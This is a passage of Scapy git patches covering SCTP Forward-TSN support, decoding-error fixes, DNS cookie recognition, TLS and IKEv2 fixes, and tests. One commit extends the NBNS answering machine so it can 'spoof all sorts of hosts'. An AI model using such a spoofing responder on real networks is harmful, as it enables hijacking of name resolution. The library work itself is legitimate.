Raw(b'\x11\x44'), +PDU(pdu_id=0x3, pdu_payload_len=3) / Raw(b'\x11\x33\x91')]))) +# Check if packets are the same +assert p1 == p2 +# Check if fields are set correctly within PDU list +assert p1.pdus[0].pdu_id == 0x1 +assert p1.pdus[0].pdu_payload_len == 1 +assert p1.pdus[1].pdu_id == 0x2 +assert p1.pdus[1].pdu_payload_len == 2 +assert p1.pdus[2].pdu_id == 0x3 +assert p1.pdus[2].pdu_payload_len == 3 + += Build PDUTransport with one PDU packet +p1 = PDUTransport(b'\x00\x00\x00\x01\x00\x00\x00\x03\x11\x22\x33') +p2 = PDUTransport(bytes(PDUTransport(pdus=[ +PDU(pdu_id=0x1, pdu_payload_len=0x3) / Raw(b'\x11\x22\x33')]))) + +# Check if packets are the same +assert p1 == p2 +# Check if fields are set correctly within PDU list +assert p1.pdus[0].pdu_id == 0x1 +assert p1.pdus[0].pdu_payload_len == 3 From 741ed3269becb8f95a860f70dca5580bb62ea367 Mon Sep 17 00:00:00 2001 From: Yuxuan Luo Date: Mon, 24 Apr 2023 15:23:00 -0400 Subject: [PATCH 1021/1632] layers/sctp.py: Add support for [I-]Forward-TSN chunks (#3994) * SCTP: add support for Forward-TSN chunk Adding support to forge Forward-TSN chunk and corresponding parameters based on RFC3758. Example usage: ``` SCTPChunkForwardTSN(new_tsn=7777, skips= [ SCTPForwardSkip(stream_id=10, stream_seq=2), SCTPForwardSkip(stream_id=11, stream_seq=2) ]) ``` Signed-off-by: Yuxuan Luo * SCTP: add support for I-Forward-TSN chunk Adding support to forge I-Forward-TSN chunk and corresponding parameters based on RFC8260. Example usage: ``` SCTPChunkIForwardTSN(new_tsn=7777, skips= [ SCTPIForwardSkip(stream_id=1, message_id=1), SCTPIForwardSkip(stream_id=2, unordered=1, message_id=2) ]) ``` Signed-off-by: Yuxuan Luo --------- Signed-off-by: Yuxuan Luo --- scapy/layers/sctp.py | 33 +++++++++++++++++++++++++++++++++ test/scapy/layers/sctp.uts | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 65 insertions(+) diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index 74a909f363b..b69d6c193ed 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -163,7 +163,9 @@ def sctp_checksum(buf): 130: "SCTPChunkReConfig", 132: "SCTPChunkPad", 0x80: "SCTPChunkAddressConfAck", + 192: "SCTPChunkForwardTSN", 0xc1: "SCTPChunkAddressConf", + 194: "SCTPChunkIForwardTSN", } sctpchunktypes = { @@ -185,7 +187,9 @@ def sctp_checksum(buf): 130: "re-config", 132: "pad", 0x80: "address-configuration-ack", + 192: "forward-tsn", 0xc1: "address-configuration", + 194: "i-forward-tsn", } sctpchunkparamtypescls = { @@ -666,6 +670,35 @@ class SCTPChunkIData(_SCTPChunkGuessPayload, Packet): ] +class SCTPForwardSkip(_SCTPChunkParam, Packet): + fields_desc = [ShortField("stream_id", None), + ShortField("stream_seq", None) + ] + + +class SCTPChunkForwardTSN(_SCTPChunkGuessPayload, Packet): + fields_desc = [ByteEnumField("type", 192, sctpchunktypes), + XByteField("flags", None), + FieldLenField("len", None, length_of="skips", + adjust=lambda pkt, x:x + 8), + IntField("new_tsn", None), + ChunkParamField("skips", None, + length_from=lambda pkt: pkt.len - 8) + ] + + +class SCTPIForwardSkip(_SCTPChunkParam, Packet): + fields_desc = [ShortField("stream_id", None), + BitField("reserved", None, 15), + BitField("unordered", None, 1), + IntField("message_id", None) + ] + + +class SCTPChunkIForwardTSN(SCTPChunkForwardTSN): + type = 194 + + class SCTPChunkInit(_SCTPChunkGuessPayload, Packet): fields_desc = [ByteEnumField("type", 1, sctpchunktypes), XByteField("flags", None), diff --git a/test/scapy/layers/sctp.uts b/test/scapy/layers/sctp.uts index 96a04d14d07..da7914d8b94 100644 --- a/test/scapy/layers/sctp.uts +++ b/test/scapy/layers/sctp.uts @@ -68,6 +68,38 @@ assert p.ppid_fsn == 2 assert p.len == (len("data") + 20) assert p.data == b"data" += basic SCTPChunkForwardTSN - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x10\x00\x00\x1e\x61\x00\x0a\x00\x01\x00\x0b\x00\x02" +p = SCTP(blob).lastlayer() +skip1 = SCTPForwardSkip(p.skips[0].load[0:4]) +skip2 = SCTPForwardSkip(p.skips[0].load[4::]) +assert isinstance(p, SCTPChunkForwardTSN) +assert p.len == 16 +assert p.new_tsn == 7777 +assert skip1.stream_id == 10 +assert skip1.stream_seq == 1 +assert skip2.stream_id == 11 +assert skip2.stream_seq == 2 + += basic SCTPChunkIForwardTSN - Dissection +~ sctp +blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc2\x00\x00\x18\x00\x00\x1e\x61\x00\x0a\x00\x00\x00\x00\x00\x14\x00\x0b\x00\x01\x00\x00\x00\x15" +p = SCTP(blob).lastlayer() +skip1 = SCTPIForwardSkip(p.skips[0].load[0:8]) +skip2 = SCTPIForwardSkip(p.skips[0].load[8::]) +assert isinstance(p, SCTPChunkIForwardTSN) +assert p.len == 24 +assert p.new_tsn == 7777 +assert skip1.stream_id == 10 +assert skip1.reserved == 0 +assert skip1.unordered == 0 +assert skip1.message_id == 20 +assert skip2.stream_id == 11 +assert skip2.reserved == 0 +assert skip2.unordered == 1 +assert skip2.message_id == 21 + = basic SCTPChunkInit - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" From 966aa9f059730560267d573b2df8ef07dbb2f96f Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 24 Apr 2023 22:24:11 +0300 Subject: [PATCH 1022/1632] No longer include LLTD hostnames in format strings (#3993) to prevent sprintf from trying to parse them. Fixes: ``` File "scapy/sendrecv.py", line 1439, in tshark File "scapy/sendrecv.py", line 1311, in sniff File "scapy/sendrecv.py", line 1254, in _run File "scapy/sessions.py", line 109, in on_packet_received File "scapy/sendrecv.py", line 1436, in _cb File "scapy/packet.py", line 1645, in summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1619, in _do_summary [Previous line repeated 6 more times] File "scapy/packet.py", line 1622, in _do_summary File "scapy/layers/lltd.py", line 718, in mysummary return (self.sprintf("Hostname: %r" % self.hostname), File "scapy/packet.py", line 1530, in sprintf j = fmt[i + 1:].index("}") ValueError: substring not found ``` --- scapy/layers/lltd.py | 2 +- test/scapy/layers/lltd.uts | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/layers/lltd.py b/scapy/layers/lltd.py index 09bb40ffbc5..e37aeef4872 100644 --- a/scapy/layers/lltd.py +++ b/scapy/layers/lltd.py @@ -715,7 +715,7 @@ class LLTDAttributeMachineName(LLTDAttribute): ] def mysummary(self): - return (self.sprintf("Hostname: %r" % self.hostname), + return (f"Hostname: {self.hostname!r}", [LLTD, LLTDAttributeHostID]) diff --git a/test/scapy/layers/lltd.uts b/test/scapy/layers/lltd.uts index 4fbe1f5c8b0..3b5dab77487 100644 --- a/test/scapy/layers/lltd.uts +++ b/test/scapy/layers/lltd.uts @@ -59,4 +59,5 @@ key, value = data.popitem() assert key.endswith(' [Detailed Icon Image]') assert value == 'abcdefg' - += Summary +assert LLTDAttributeMachineName(b'\x0f\x04{\x00\n\x00').mysummary()[0] == r"Hostname: '{\n'" From 0f294fd6231baa5876624776aab9817bd6bc2b39 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 18 Apr 2023 02:29:52 +0000 Subject: [PATCH 1023/1632] Tolerate decoding errors in LLMNR queries/responses Fixes: ``` File "scapy/sendrecv.py", line 1439, in tshark File "scapy/sendrecv.py", line 1311, in sniff File "scapy/sendrecv.py", line 1254, in _run File "scapy/sessions.py", line 109, in on_packet_received File "scapy/sendrecv.py", line 1436, in _cb File "scapy/packet.py", line 1645, in summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1622, in _do_summary File "scapy/layers/llmnr.py", line 63, in mysummary self.qd.qname.decode(), UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 2: invalid start byte ``` It's a follow-up to dd7a5c97d68c00d1d03ecf8ac27c6c7038525065 --- scapy/layers/llmnr.py | 4 ++-- test/scapy/layers/llmnr.uts | 6 ++++++ 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index 01e211939ca..9cce97cd8c0 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -55,12 +55,12 @@ def hashret(self): def mysummary(self): if self.an: return "LLMNRResponse '%s' is at '%s'" % ( - self.an.rrname.decode(), + self.an.rrname.decode(errors="backslashreplace"), self.an.rdata, ), [UDP] if self.qd: return "LLMNRQuery who has '%s'" % ( - self.qd.qname.decode(), + self.qd.qname.decode(errors="backslashreplace"), ), [UDP] diff --git a/test/scapy/layers/llmnr.uts b/test/scapy/layers/llmnr.uts index fe95e259b8f..2da7a907859 100644 --- a/test/scapy/layers/llmnr.uts +++ b/test/scapy/layers/llmnr.uts @@ -36,3 +36,9 @@ b = Ether(b'\x14\x0cv\x8f\xfe(\xd0P\x99V\xdd\xf9\x08\x00E\x00\x00(\x00\x01\x00\x assert b.answers(a) assert not a.answers(b) += Summary +q = LLMNRQuery(b'Yy\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\xff\x00\x00\x01\x00\x01') +assert q.mysummary()[0] == r"LLMNRQuery who has '\xff.'" + +r = LLMNRResponse(b'\n\xe6\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00\x01\xff\x00\x00\x1c\x00\x01\xc0\x0c\x00\x1c\x00\x01\x00\x00\x00\x1e\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00xu\x17\xff\xfe\xbc\xac\xcb') +assert r.mysummary()[0] == r"LLMNRResponse '\xff.' is at 'fe80::7875:17ff:febc:accb'" From c6a097fac14d36be975fd07d90c741063be4121f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 9 Apr 2023 18:39:39 +0200 Subject: [PATCH 1024/1632] Use time.monotonic() in sndrcv --- scapy/sendrecv.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index bad1096757f..8628a000e96 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -741,7 +741,7 @@ def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]] if count == 0: break count -= 1 - start = time.time() + start = time.monotonic() if verbose > 1: print("\rsend...\r", end=' ') res = srfunc(pkts, timeout=timeout, verbose=0, chainCC=True, *args, **kargs) # noqa: E501 @@ -771,7 +771,7 @@ def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]] if store: ans += res[0] unans += res[1] - end = time.time() + end = time.monotonic() if end - start < inter: time.sleep(inter + start - end) except KeyboardInterrupt: @@ -1208,12 +1208,12 @@ def stop_cb(): # Start timeout if timeout is not None: - stoptime = time.time() + timeout + stoptime = time.monotonic() + timeout remain = None while sniff_sockets and self.continue_sniff: if timeout is not None: - remain = stoptime - time.time() + remain = stoptime - time.monotonic() if remain <= 0: break sockets = select_func(list(sniff_sockets.keys()), remain) From f3a789fb413dcaecca78be615725763dc71b25af Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 28 Apr 2023 14:23:10 +0200 Subject: [PATCH 1025/1632] Python-can changed it's interface and therefore raised warnings. This PR fixes those warnings --- scapy/contrib/cansocket_python_can.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index d8196ca25cb..89dbb6bb0cf 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -41,7 +41,7 @@ __all__ = ["CANSocket", "PythonCANSocket"] -class SocketMapper: +class SocketMapper(object): """Internal Helper class to map a python-can bus object to a list of SocketWrapper instances """ @@ -250,6 +250,7 @@ def shutdown(self): python-can. """ SocketsPool.unregister(self) + super().shutdown() class PythonCANSocket(SuperSocket): From a418ea633584b319b563ee6be24251d2ca0a6a03 Mon Sep 17 00:00:00 2001 From: Sebastian Baar Date: Wed, 19 Apr 2023 09:02:20 +0200 Subject: [PATCH 1026/1632] change order of creation of list to allow usage of generators for extended_scan_range --- scapy/contrib/isotp/isotp_scanner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index b5b38e3670f..bfd4760fa08 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -246,6 +246,7 @@ def scan_extended(sock, # type: SuperSocket """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] scan_block_size = scan_block_size or 1 + r = list(extended_scan_range) for value in scan_range: if noise_ids and value in noise_ids: @@ -254,7 +255,6 @@ def scan_extended(sock, # type: SuperSocket pkt = get_isotp_packet( value, extended=True, extended_can_id=extended_can_id) id_list = [] # type: List[int] - r = list(extended_scan_range) for ext_isotp_id in range(r[0], r[-1], scan_block_size): if stop_event is not None and stop_event.is_set(): break From 047be325fe7b67fc05287632e7b14bc9e5d6701f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 20 Apr 2023 16:45:02 +0200 Subject: [PATCH 1027/1632] Fix debug message from AutomotiveScannerExecutor --- scapy/contrib/automotive/scanner/enumerator.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index c231b1fa8a8..b0a6d0cd27d 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -303,7 +303,7 @@ def execute(self, socket, state, **kwargs): start_time = time.monotonic() log_automotive.debug( - "Start execution of enumerator: %s", time.ctime(start_time)) + "Start execution of enumerator: %s", time.ctime()) for req in it: res = self.sr1_with_retry_on_error(req, socket, state, timeout) From 9d81d48812a5adb4e35bb9672a1a7fba9ec94a2c Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 7 May 2023 19:23:45 +0300 Subject: [PATCH 1028/1632] Look for flag values instead of flag fields (#4004) to prevent .command() from producing invalid commands containing something like ``. When flag fields are embedded into other fields they can't be recognized by looking at their type without following the "fld" chain. Their values are always FlagValues though so this check can be used instead. Fixes: ``` p = CondFlagsTest(b"\x00\x0f") assert p == eval(p.command()) Traceback (most recent call last): File "", line 2, in File "", line 1 CondFlagsTest(b=0, f=) ^ SyntaxError: invalid syntax ``` It's a follow-up to a0fd8688dc405799b676e21d7a0741512ad9aca1 --- scapy/packet.py | 3 ++- test/fields.uts | 11 +++++++++++ test/scapy/layers/dot11.uts | 1 + 3 files changed, 14 insertions(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index e5e06571d1c..4c35c517d28 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -29,6 +29,7 @@ EnumField, Field, FlagsField, + FlagValue, MultiEnumField, MultipleTypeField, PacketListField, @@ -1679,7 +1680,7 @@ def command(self): getattr(x, 'command', lambda: repr(x))() for x in fv ) - elif isinstance(fld, FlagsField): + elif isinstance(fv, FlagValue): fv = int(fv) elif callable(getattr(fv, 'command', None)): fv = fv.command() diff --git a/test/fields.uts b/test/fields.uts index f7e3c2019c7..fe0329f93d3 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1696,6 +1696,17 @@ assert a.sprintf("%flags%") == "A+B" b = FlagsTest2(flags="B+C") assert b.flags == 0x1000 | 0x0008 += Conditional FlagsField command + +class CondFlagsTest(Packet): + fields_desc = [ + ByteField("b", 0), + ConditionalField(FlagsField("f", 0, 8, ""), lambda p: p.b == 0) + ] + +p = CondFlagsTest(b"\x00\x0f") +assert p == eval(p.command()) + ######## ######## + ScalingField diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index fa0e995d6ee..a4e294e017b 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -443,6 +443,7 @@ assert f.RU_channel2 == [114, 114, 114, 114] assert f.lsig_data1.length assert f.lsig_length == 182 assert f.lsig_rate == 0 +assert f == eval(f.command()) = Reassociation request f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') From 7b4e34e149f09b4e588919e58ac2472ae4777277 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Sun, 14 May 2023 22:08:19 +0200 Subject: [PATCH 1029/1632] 802.1q: rename .id field to .dei --- scapy/layers/l2.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index c0da4e4d324..e7973a1cda8 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -371,9 +371,12 @@ class Dot1Q(Packet): name = "802.1Q" aliastypes = [Ether] fields_desc = [BitField("prio", 0, 3), - BitField("id", 0, 1), + BitField("dei", 0, 1), BitField("vlan", 1, 12), XShortEnumField("type", 0x0000, ETHER_TYPES)] + deprecated_fields = { + "id": ("dei", "2.5.0"), + } def answers(self, other): # type: (Packet) -> int From bed85cbb8d020dc4ceb70571f3457bebec5154fb Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 20 May 2023 16:47:43 +0300 Subject: [PATCH 1030/1632] Recognize DNS cookies (#4014) It's mostly prompted by relatively new dig and delv sending cookies by default (unless `+nocookie`/`+noedns`/... is specified explicitly). https://datatracker.ietf.org/doc/html/rfc7873#section-4 --- scapy/layers/dns.py | 2 +- test/scapy/layers/dns_edns0.uts | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 9dc1a19d9ff..1244ca130a7 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -541,7 +541,7 @@ def pre_dissect(self, s): # RFC 2671 - Extension Mechanisms for DNS (EDNS0) edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", - 5: "PING", 8: "edns-client-subnet"} + 5: "PING", 8: "edns-client-subnet", 10: "COOKIE"} class EDNS0TLV(Packet): diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index 143957db38e..d4893aac0ab 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -54,6 +54,13 @@ raw(tlv) == b'\x00\x05\x00\x04\x00\x11"3' #conf.debug_dissector = old_debug_dissector #len(r.ar) and r.ar.rdata[0].optcode == 4 # XXX: should be 5 ++ Test EDNS-COOKIE + += EDNS-COOKIE - basic instantiation +tlv = EDNS0TLV(optcode="COOKIE", optdata=b"\x01" * 8) +assert tlv.optcode == 10 +assert raw(tlv) == b"\x00\x0A\x00\x08\x01\x01\x01\x01\x01\x01\x01\x01" + + Test DNS Name Server Identifier (NSID) Option = NSID- basic instantiation From 7f89ce51c09417c2aa9d78d3e5c75091cacd4bff Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 22 May 2023 15:57:47 +0300 Subject: [PATCH 1031/1632] Tolerate non-UTF-8 NetBIOS names in NetBIOS answering machines (#4007) NetBIOS names encoded using non-UTF-8 encodings can't be decoded without specifying them explicitly (and for that to work they have to be inferred based on bytes). It's kind of possible but instead of guessing encodings `is_request` uses raw question names and `server_name` is converted to bytes instead. To make it possible to spoof all sorts of hosts NBNS_am also accepts bytes as server_names directly (but the patch is backward-compatible with the previous versions accepting strings only). Empty strings and Nones are still equivalent and keep working too. Fixes: ``` File "scapy/ansmachine.py", line 57, in File "scapy/ansmachine.py", line 211, in __call__ File "scapy/ansmachine.py", line 217, in sniff File "scapy/sendrecv.py", line 1311, in sniff File "scapy/sendrecv.py", line 1254, in _run File "scapy/sessions.py", line 109, in on_packet_received File "scapy/ansmachine.py", line 167, in reply File "scapy/layers/netbios.py", line 381, in is_request req[NBNSQueryRequest].QUESTION_NAME.decode().strip() == ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf0 in position 0: invalid continuation byte ``` --- scapy/layers/netbios.py | 6 +++--- test/answering_machines.uts | 18 ++++++++++++++++++ 2 files changed, 21 insertions(+), 3 deletions(-) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 5986528784a..678fa6c4f7c 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -13,6 +13,7 @@ from scapy.arch import get_if_addr from scapy.base_classes import Net from scapy.ansmachine import AnsweringMachine +from scapy.compat import bytes_encode from scapy.config import conf from scapy.packet import Packet, bind_bottom_up, bind_layers, bind_top_down @@ -366,7 +367,7 @@ def parse_options(self, server_name=None, from_ip=None, ip=None): :param from_ip: an IP (can have a netmask) to filter on :param ip: the IP to answer with """ - self.ServerName = server_name + self.ServerName = bytes_encode(server_name or "") self.ip = ip if isinstance(from_ip, str): self.from_ip = Net(from_ip) @@ -378,8 +379,7 @@ def is_request(self, req): return False return NBNSQueryRequest in req and ( not self.ServerName or - req[NBNSQueryRequest].QUESTION_NAME.decode().strip() == - self.ServerName + req[NBNSQueryRequest].QUESTION_NAME.strip() == self.ServerName ) def make_reply(self, req): diff --git a/test/answering_machines.uts b/test/answering_machines.uts index 22a0b4a4b81..54eee4a705c 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -133,3 +133,21 @@ def check_WiFi_am_reply(packet): test_WiFi_am(Dot11(FCfield="to-DS")/IP()/TCP()/"Scapy", check_WiFi_am_reply, iffrom="scapy0", ifto="scapy1", replace="5c4pY", pattern="Scapy") + + += NBNS_am +def check_NBNS_am_reply(name): + def check(packet): + assert NBNSQueryResponse in packet and packet[NBNSQueryResponse].RR_NAME == bytes_encode(name) + return check + +for server_name in (None, "", b"test", "test"): + test_am(NBNS_am, + Ether()/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME="test"), + check_NBNS_am_reply("test"), + server_name=server_name) + +test_am(NBNS_am, + Ether()/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME=b"\x85"), + check_NBNS_am_reply(b"\x85"), + server_name=b"\x85") From 8538f5082d4de200c2f3c934fba79caab3253d32 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 30 May 2023 00:59:50 +0200 Subject: [PATCH 1032/1632] Force the source MAC address in neighsol() (#4020) --- scapy/layers/inet6.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 67393b78b26..125e57ec272 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -79,7 +79,9 @@ def neighsol(addr, src, iface, timeout=1, chainCC=0): This function sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address address. - 'src' address is used as source of the message. Message is sent on iface. + 'src' address is used as the source IPv6 address of the message. Message + is sent on 'iface'. The source MAC address is retrieved accordingly. + By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is @@ -89,9 +91,10 @@ def neighsol(addr, src, iface, timeout=1, chainCC=0): nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) - p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255) + sm = get_if_hwaddr(iface) + p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) - p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) + p /= ICMPv6NDOptSrcLLAddr(lladdr=sm) res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) From 5b90dbd0c6b8b9956518b989aff392b09b75a80b Mon Sep 17 00:00:00 2001 From: Luke Valenta Date: Tue, 23 May 2023 08:40:07 -0400 Subject: [PATCH 1033/1632] Add crypto_validator decorator to TLS13_HKDF methods to fix #4005 Trigger an ImportError on calls to any TLS13_HKDF methods if the 'cryptography' module is missing. --- scapy/layers/tls/crypto/hkdf.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/crypto/hkdf.py b/scapy/layers/tls/crypto/hkdf.py index 28cb002ce43..a4a3edfa9d0 100644 --- a/scapy/layers/tls/crypto/hkdf.py +++ b/scapy/layers/tls/crypto/hkdf.py @@ -9,7 +9,7 @@ import struct -from scapy.config import conf +from scapy.config import conf, crypto_validator from scapy.layers.tls.crypto.pkcs1 import _get_hash if conf.crypto_valid: @@ -20,9 +20,11 @@ class TLS13_HKDF(object): + @crypto_validator def __init__(self, hash_name="sha256"): self.hash = _get_hash(hash_name) + @crypto_validator def extract(self, salt, ikm): h = self.hash hkdf = HKDF(h, h.digest_size, salt, None, default_backend()) @@ -30,11 +32,13 @@ def extract(self, salt, ikm): ikm = b"\x00" * h.digest_size return hkdf._extract(ikm) + @crypto_validator def expand(self, prk, info, L): h = self.hash hkdf = HKDFExpand(h, L, info, default_backend()) return hkdf.derive(prk) + @crypto_validator def expand_label(self, secret, label, hash_value, length): hkdf_label = struct.pack("!H", length) hkdf_label += struct.pack("B", 6 + len(label)) @@ -44,6 +48,7 @@ def expand_label(self, secret, label, hash_value, length): hkdf_label += hash_value return self.expand(secret, hkdf_label, length) + @crypto_validator def derive_secret(self, secret, label, messages): h = Hash(self.hash, backend=default_backend()) h.update(messages) @@ -51,6 +56,7 @@ def derive_secret(self, secret, label, messages): hash_len = self.hash.digest_size return self.expand_label(secret, label, hash_messages, hash_len) + @crypto_validator def compute_verify_data(self, basekey, handshake_context): hash_len = self.hash.digest_size finished_key = self.expand_label(basekey, b"finished", b"", hash_len) From 3da71cb275721292131a3ea5196bfa98883741f2 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 25 May 2023 20:52:44 +0200 Subject: [PATCH 1034/1632] fix depricated argument in python-can --- scapy/contrib/cansocket_python_can.py | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 89dbb6bb0cf..baf4a6cbd74 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -151,8 +151,12 @@ def register(self, socket, *args, **kwargs): :param args: Arguments for the python-can Bus object :param kwargs: Keyword arguments for the python-can Bus object """ - k = str(kwargs.get("bustype", "unknown_bustype")) + "_" + \ - str(kwargs.get("channel", "unknown_channel")) + if "interface" in kwargs.keys(): + k = str(kwargs.get("interface", "unknown_interface")) + "_" + \ + str(kwargs.get("channel", "unknown_channel")) + else: + k = str(kwargs.get("bustype", "unknown_bustype")) + "_" + \ + str(kwargs.get("channel", "unknown_channel")) with self.pool_mutex: if k in self.pool: t = self.pool[k] From a45836f97ef61baa2f17590d19c710414af6b9ef Mon Sep 17 00:00:00 2001 From: Alex Gaynor Date: Sun, 4 Jun 2023 22:21:32 -0400 Subject: [PATCH 1035/1632] Import InvalidSignature from the correct location --- scapy/layers/tls/cert.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 5eab98fb04a..ed934e8b17f 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -45,10 +45,10 @@ _EncryptAndVerifyRSA, _DecryptAndSignRSA from scapy.compat import raw, bytes_encode if conf.crypto_valid: + from cryptography.exceptions import InvalidSignature from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import rsa, ec - from cryptography.hazmat.backends.openssl.ec import InvalidSignature # Maximum allowed size in bytes for a certificate file, to avoid From cabf209b08b3efce0ca9d5cca0bb68c83ac470a6 Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Wed, 3 May 2023 00:04:38 +0200 Subject: [PATCH 1036/1632] IKEv2: fix length calculation for IKEv2_Notify payloads with SPI As a testcase, add a decrypted CREATE_CHILD_SA request for an ESP child sa, which contains a REKEY_SA Notify payload. --- scapy/contrib/ikev2.py | 3 +- test/contrib/ikev2.uts | 115 +++++++++++++++++++++++++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 0912d6b741d..d4fc1e03863 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -748,7 +748,8 @@ class 